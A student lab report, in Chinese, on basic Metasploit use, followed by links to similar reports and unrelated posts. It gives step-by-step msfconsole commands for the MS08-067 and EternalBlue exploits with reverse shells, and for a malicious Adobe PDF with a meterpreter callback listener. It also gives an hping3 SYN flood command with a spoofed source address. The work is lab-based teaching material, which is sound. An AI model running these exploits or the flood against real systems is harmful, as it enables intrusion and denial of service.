20165306 Exp5 MSF基础应用
Exp5 MSF基础应用
一、实践概述
1. 实践内容
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。实现:
1.1一个主动攻击实践
- ms08-067+windows/shell_reverse_tcp(成功)
1.2 一个针对浏览器的攻击
- ms17_010_eternalblue+generic/shell_reverse_tcp(成功)
1.3 一个针对客户端的攻击
- Adobe+windows/meterpreter/reverse_tcp(成功)
1.4 成功应用任何一个辅助模块
- dos/tcp/synflood(成功且唯一)
2.基础问题回答
用自己的话解释什么是exploit,payload,encode.
- exploit:测试者利用系统、程序或服务的漏洞进行攻击的一个过程。
- payload:攻击者在目标系统上执行的一段攻击代码,该代码具有反弹连接、创建用户、执行其他系统命令的功能。
- encode:一是为了避免使攻击载荷不能完整运行的“坏字符”,二是为了改变特征码,帮助攻击载荷避免被杀软发现。
二、实验步骤
任务一 Windows服务渗透攻击——MS08-067安全漏洞
攻击机Kali:10.1.1.169
靶机Win2000:10.1.1.154
payload:windows/shell_reverse_tcp
1.攻击机和靶机改成桥接模式,相互ping通
2.msfconsole
进入控制台
search ms08-067
查找漏洞
3.如上图,输入use exploit/windows/smb/ms08_067_netapi
指令选择漏洞
show options
查看设置信息
set RHOSTS 10.1.1.154
设置Win2000 IP
search portscan
搜索端口
4.如上图,输入use auxiliary/scanner/portscan/tcp
选择漏洞
show options
查看设置信息
set RHOSTS 10.1.1.154
exploit
看到445端口开放
5.输入use exploit/windows/smb/ms08_067_netapi
show payloads
查看可用payload
如上图,输入set payload windows/shell_reverse_tcp
选择payload
show options
exploit
进行攻击成功
任务二 一个针对浏览器的攻击——ms17-010
攻击机Kali:192.168.43.91
靶机Win7专业版:192.168.43.182
payload:generic/shell_reverse_tcp
1.攻击机和靶机改成桥接模式,关闭防火墙,相互ping通
2.msfconsole
进入控制台
search ms17-010
查找漏洞
3.如上图,输入use exploit/windows/smb/ms17_010_eternalblue
指令选择漏洞
show payloads
显示可用攻击载荷
set payload generic/shell_reverse_tcp
选择攻击载荷
show options
查看配置信息
set LHOSTS 192.168.43.91
设置Kali IP
set RHOSTS 192.168.43.182
设置Win7 IP
exploit
进行攻击成功
任务三 一个针对客户端的攻击——Adobe
攻击机Kali:10.1.1.169
靶机WinXPattacker:10.1.1.194
payload:windows/meterpreter/reverse_tcp
1.攻击机和靶机改成桥接模式,相互ping通
2.msfconsole
进入控制台
search adobe
查找漏洞
3.如下图,输入use windows/fileformat/adobe_cooltype_sing
指令选择漏洞
show payloads
显示可用攻击载荷
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.0.169
设置Kali IP
set LPORT 5306
设置攻击端口
set FILENAME 5306.pdf
设置生成的pdf文件名
exploit
4.开启一个新终端
cd /root/.msf4/local
进入pdf文件保存目录
cp 5306XYH.pdf /mnt/hgfs/XYH
把pdf文件复制到与主机的共享文件夹中,再把pdf从主机拖到winXP
5.回到原控制台
back
退出当前模块
use exploit/multi/handler
进入监听模块
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.0.169
设置kali IP
set LPORT 5306
设置攻击端口
exploit
开始监听
6.WinXP中打开5306XYH.pdf
回到Kali发现回连成功
任务四 成功应用任何一个辅助模块
攻击机Kali:10.1.1.169
靶机Win7:10.1.1.113
漏洞:dos/tcp/synflood(唯一)
1.攻击机和靶机改成桥接模式,相互ping通
2.msfconsole
进入控制台
show auxiliary
命令显示所有的辅助模块以及他们的用途
一眼相中TCP SYN FLOODER
3.SYN Flood攻击原理
SYN:同步序列编号(Synchronize Sequence Numbers),是TCP/IP建立连接时使用的握手信号。
SYN Flood利用TCP协议缺陷,通过一定的操作破坏TCP三次握手建立正常连接,占用并耗费系统资源,使得被攻击方资源耗尽,无法及时回应或处理正常的服务请求。
攻击原理:通常,客户端在短时间内伪造大量不存在的IP地址,向服务器不断地发送syn包,服务器回复确认包,在进行第三次握手时,服务器等待客户的确认,由于源地址是不存在的,服务器需要不断的重发直至超时,才将此条目从未连接队列删除。这些伪造的SYN包将长时间占用未连接队列,正常的SYN请求不能进去以及被丢弃,目标系统运行缓慢,引起网络拥堵。
4.Win7下按Ctrl+Alt+Ins
启动任务管理器
查看性能
,监控CPU的利用率,开启Wireshark抓包
5.Kali中输入hping3 -q -n -a 5.3.0.6 -S -s 5306 --keep -p 445 --flood 10.1.1.113
其中5.3.0.6为伪造源IP,5306为伪造源端口,445为目的端口,10.1.1.113为目的IP
6.查看Win7的任务管理器和wireshark抓包结果
如图,Win7的性能利用率已经达到96%并居高不下。Wireshark抓到的包显示大量源地址为5.3.0.6,在给靶机win7发送请求连接,进行SYN Flood攻击。综上表明已经攻击成功。
7.Kali中按Ctrl+C
结束攻击
查看Win7的任务管理器,性能利用率恢复正常。
20165306 Exp5 MSF基础应用的更多相关文章
- 2018-2019 20165232 Exp5 MSF基础应用
2018-2019 20165232 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个 ...
- 2018-2019 20165237网络对抗 Exp5 MSF基础应用
2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...
- 2018-2019 20165221 网络对抗 Exp5 MSF基础
2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...
- 2018-2019-2 20165206 网络攻防技术 Exp5 MSF基础应用
- 2018-2019-2 20165206<网络攻防技术>Exp5 MSF基础应用 - 实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如 ...
- 2018-2019 20165235 网络对抗 Exp5 MSF基础
2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ...
- 2018-2019-2 网络对抗技术 20162329 Exp5 MSF基础应用
目录 Exp5 MSF基础应用 一.基础问题回答 二.攻击系统 ms08_067攻击(成功) 三.攻击浏览器 ms11_050_mshtml_cobjectelement(Win7失败) 手机浏览器攻 ...
- 2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用
<网络对抗技术>Exp5 MSF基础应用 实验目的 实验内容 一个主动攻击实践(ms08_067) 一个针对浏览器的攻击(ms11_050) 一个针对客户端的攻击(adobe_toolbu ...
- 2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具 ...
- 2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用 验前准备 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻 ...
随机推荐
- linux 对MTD分区nand flash的烧写和读取
使用mtd-utils工具实现对flash的升级分区的烧写yaffs2 yaffs2的格式是根据所使用的nandflash来制作的,不同的nandflash,得到的yaffs2是不一样的,具体可以参考 ...
- git使用:本地分支merge到远程分支
背景:为了更加规范维护自动化测试工程,代码提交流程最近更新了,先拉分支到本地修改,完成后同步到远程分支. 前置条件 (1)本地机器可通过ssh与gitlab服务器通信 (2)gitlab上的测试项目中 ...
- python借助ADB工具实现自动化操作手机
核心工具——ADB工具 adb工具用于连接Android手机和PC端,我们借助adb工具,就可以通过命令行对手机进行相应的操作 注意:若要通过adb操作手机,需打开手机的开发者模式,并打开USB调试功 ...
- mac 添加环境变量(jmeter添加至环境变量中)
Mac系统的环境变量,加载顺序为:a. /etc/profileb. /etc/pathsc. ~/.bash_profiled. ~/.bash_logine. ~/.profilef. ~/.ba ...
- C++ 自定义订单号
自定义订单号 #include<iostream> #include<stack> #include <time.h> #include <sys/timeb ...
- 《linux就该这么学》第十五节课:第14,15章,dhcp服务和邮件系统
(借鉴请改动) 13章收尾 13.6.分离解析技术 1.在主配置文件中改两个any 2.编辑区域配置文件,写入acl,使用match匹配 ...
- Centos7 关于防火墙的一些简单配置
近期安装了linux系统Centos7,接触下来发现了与原来的Centos6.5有一些差别,这里主要记录下来我的一些关于Centos7防火墙的了解. 一.firewall简介 CentOS 7中防火墙 ...
- js选中变色,不选中鼠标放上变色
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8&quo ...
- IT题库6-同步和异步
同步就是许多线程同时共用一个资源,一个线程在用别的线程就要等待.异步相反,可以不用等待. 同步:发送一个请求,等待返回,然后才能再发送下一个请求:异步:发送一个请求,不等待返回,随时可以再发送下一个请 ...
- LR12集合点设置和多个负载生成器策略
今天给大家分享几个有关LR12的Controller使用过程中的几个常用问题: 一,脚本中添加集合点函数---lr_rendezvous 1,在被测接口事物函数之前加入集合点函数--lr_rendez ...